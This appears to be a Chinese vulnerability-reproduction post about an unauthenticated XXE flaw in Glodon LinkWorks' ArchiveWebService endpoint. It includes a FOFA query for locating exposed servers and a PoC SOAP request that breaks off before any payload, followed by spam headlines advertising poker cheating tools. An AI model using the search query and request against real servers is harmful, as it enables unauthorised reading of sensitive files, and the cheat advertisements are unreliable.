广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

相关内容

热门资讯

一分钟揭秘《线上wpk辅助透视... 一分钟揭秘《线上wpk辅助透视》外挂辅助挂测试(2020已更新)(哔哩哔哩);1、超多福利:超高返利...
今日公布靠谱WPK其实确实是有... 今日公布靠谱WPK其实确实是有挂,太坑了其实有挂猫腻(有挂秘笈)-哔哩哔哩;1、不需要AI权限,帮助...
2025有料了解(微扑克透明挂... 2025有料了解(微扑克透明挂)外挂辅助器代打工具(辅助挂)辅助器测试(有挂透视)详细教程(哔哩哔哩...
科普分享微扑克数据(微扑克)辅... 科普分享微扑克数据(微扑克)辅助软件(外挂辅助AI代打)详细教程(2022已更新)(哔哩哔哩);1、...
如何分辨真伪《Wepoke内置... 如何分辨真伪《Wepoke内置》软件透明挂!(软件)透明挂系统(2024已更新)(哔哩哔哩);1、让...
分辨真假!(WPK打法)辅助透... 分辨真假!(WPK打法)辅助透视!(透视)外挂辅助器模拟器(2020已更新)(哔哩哔哩);WPK中的...
推荐一款微扑克规律原来是真的有... 推荐一款微扑克规律原来是真的有挂,太奸诈了原来确实是有挂,详细教程(有挂细节);1.微扑克 ai辅助...
攻略教程《wPK透视辅助》外挂... 攻略教程《wPK透视辅助》外挂辅助器测试(2024已更新)(哔哩哔哩);亲真的是有正版授权,小编(透...
推荐攻略Wepoke软件透明挂... 大家肯定在之前或者中玩过推荐攻略Wepoke软件透明挂!(辅助挂)太嚣张了原来是有猫腻的(2021已...
我来教教你Wepoke大厅软件... 我来教教你Wepoke大厅软件透明挂!太坏了原来是有挂(有挂规律)(哔哩哔哩);是一种具有地方特色的...